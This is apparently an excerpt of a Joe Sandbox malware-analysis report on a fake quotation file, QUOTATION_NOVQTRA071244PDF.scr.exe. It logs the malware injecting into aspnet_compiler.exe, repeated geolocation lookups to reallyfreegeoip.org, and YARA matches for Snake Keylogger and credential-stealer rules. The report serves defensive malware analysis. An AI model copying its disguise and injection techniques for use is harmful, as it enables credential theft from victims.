2024-11-18 17:12:11 UTC	842	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:11 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: MISS Last-Modified: Mon, 18 Nov 2024 17:12:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3pIEVf1B%2BaKgPpHKcUjIRzT8GXSQEBVZzC1xin4DObJfsEh7usp00JIRbl3MFn4Nkq%2ByFxLsYumwqOxvT45Dp%2Bta%2FQdn7M3JrZu3VHhNOJOvLCMMV%2Fs674xhiPsDfDZy38eOMFR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49957cd9c86a41-MSP alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24422&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=118290&cwnd=32&unsent_bytes=0&cid=e34d2437e14d5037&ts=603&x=0"
2024-11-18 17:12:11 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49981	188.114.97.3	443	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:12:12 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:12:12 UTC	852	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:12 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: MISS Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1mA1UMQL%2B%2FuCvfJVMEpG0DTKX51aRLeDoaHxIYTCByna2UtsQiaz4%2BK0o5Zp%2Bb9UiR2Abi3BV9McUU%2F79J3%2Bp%2BBPgN5%2B9NADEavno6gBrCCMV8Y16Ehhv%2BB5vI%2FwMkWCPgQ1cDe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499585e949023b-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24666&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=117280&cwnd=32&unsent_bytes=0&cid=a26d2ceda16f022d&ts=448&x=0"
2024-11-18 17:12:12 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49983	188.114.97.3	443	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:12:14 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:12:14 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:14 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51417 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjXtRsLSi8Bp0AD7MynafaSxbCwkpSpXoFxY6Jphm9QWydsCWjdUVMmJ8BHIn51kByCN5gLfsHD3uAO9bQ3A22njalpsDaNxd%2Bl3HG7ZZ80yxIAm%2BJoO%2FQrWvTr%2B99n2S7RtYbb%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4995922c89a91e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1516&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1882964&cwnd=250&unsent_bytes=0&cid=919eb56e4a48b061&ts=181&x=0"
2024-11-18 17:12:14 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49985	188.114.97.3	443	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:12:16 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:12:16 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:16 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51410 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2F12Ghut4zOF3%2BQPTpIsV1jZVcPUGuWEqhmqEbe1FfO77xzXZTUkh%2FoThbJx%2Fkzh8HqrHTRTVPkCRlUkXq0Nuyz1E9K9bItS740T6ZBKZuFNKggFDcayy%2BvNioGRjhGMiJToI%2BVM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49959dcf085206-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19036&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=151957&cwnd=32&unsent_bytes=0&cid=366b8fcf28ef02f6&ts=359&x=0"
2024-11-18 17:12:16 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49987	188.114.97.3	443	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:12:17 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:12:18 UTC	856	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:17 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 5975 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h9zgbPs%2F%2Ft%2BOwKbIXiu1rsZDQmt1GQNfOSuIs89XGO4KmyxQrOPE04vrsTojDbw3dHHCv05%2BiRT%2FR9tjqjMYvgEUbsCablswQHU9hV1TQhbJ6LYoah8CwBkZ%2FlhOI90%2Bn6aQ9rE7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4995a82ff4ad80-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17901&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=163893&cwnd=32&unsent_bytes=0&cid=5c85d009ccdc6693&ts=189&x=0"
2024-11-18 17:12:18 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49989	188.114.97.3	443	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:12:19 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:12:19 UTC	844	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:19 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 5977 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d35XYgN8qnUsgH9oLFZAsWj97fGFck3Ym0zlFhbKxA4Yte0CQHGYSTrWoEOxs2BIbzOQz3Xu4sHLxSj39a%2FlajLyQlxXiZzpCpvRkJ2HSznEHXf4vidT1k5UUe9laFqfWJrSV5Pb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4995b33d0fbf68-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18914&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153308&cwnd=32&unsent_bytes=0&cid=1cc13b13ee5377b1&ts=214&x=0"
2024-11-18 17:12:19 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49991	188.114.97.3	443	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:12:22 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:12:22 UTC	852	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:22 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51425 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dxP2u0Jmd9hLlS4NQVTe2oGyiW5GhQdjNnn5%2Bqx2gNgH6pPOKr%2B4YBhcWh8vwGuOEJUCiQK84kCwO7pMp5l6L62lSD10%2FsPISO00SLw42sT7%2BGgINZiBC7XChnUwXD6Mcuw3oGpi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4995c39b16e857-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2179082&cwnd=251&unsent_bytes=0&cid=3836487abbd4c3f7&ts=161&x=0"
2024-11-18 17:12:22 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49993	188.114.97.3	443	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:12:23 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:12:24 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:24 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51418 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcWxtrfzpEebdAlxBecXjQrdjKRlPzht0aTnCq%2B8f1GD3vi%2BG98IxY40jfEPKyz2U1%2F4EHN1YCs9Etd4yM62nN3d8Cr0%2FKRHpX1hRQTJtQqu0tsM4AV7TquYmZ7w7H%2BGA%2BOTdtq8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4995ce08d07984-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18988&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=152960&cwnd=32&unsent_bytes=0&cid=d8c015f72b366e2c&ts=179&x=0"
2024-11-18 17:12:24 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Target ID:	0
Start time:	12:11:05
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe"
Imagebase:	0x210a5e80000
File size:	1'484'800 bytes
MD5 hash:	E717ED3845849E9A3BFBB53C8ECB87F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1914720622.00000210A815E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1924921485.00000210C07B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:12:07
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x1e56c1a0000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2532886992.000001E500245000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.2535505906.000001E56C220000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2532886992.000001E500001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	12:12:08
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FF7C1289A90 Relevance: 1.9, Strings: 1, Instructions: 671COMMON

Download Yara Rule

Strings

U*_H, xrefs: 00007FF7C128CF6E

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: U*_H
API String ID: 0-2909367171
Opcode ID: 4c310555de2141206266c34d2d2dc74def6942dd03fdbc54a0843768debfa592
Instruction ID: ea39d4d5891e1868ae0fe8e51e0065bd2f3d5610fb224790bab65ff761b03302
Opcode Fuzzy Hash: 4c310555de2141206266c34d2d2dc74def6942dd03fdbc54a0843768debfa592
Instruction Fuzzy Hash: 3312E431B1CA4A4FF759EF2C88856B9B7D1FF98350F844179D48EC3682DE68B8128791

Function 00007FF7C1282328 Relevance: 1.8, Instructions: 1806COMMON

Download Yara Rule

Memory Dump Source

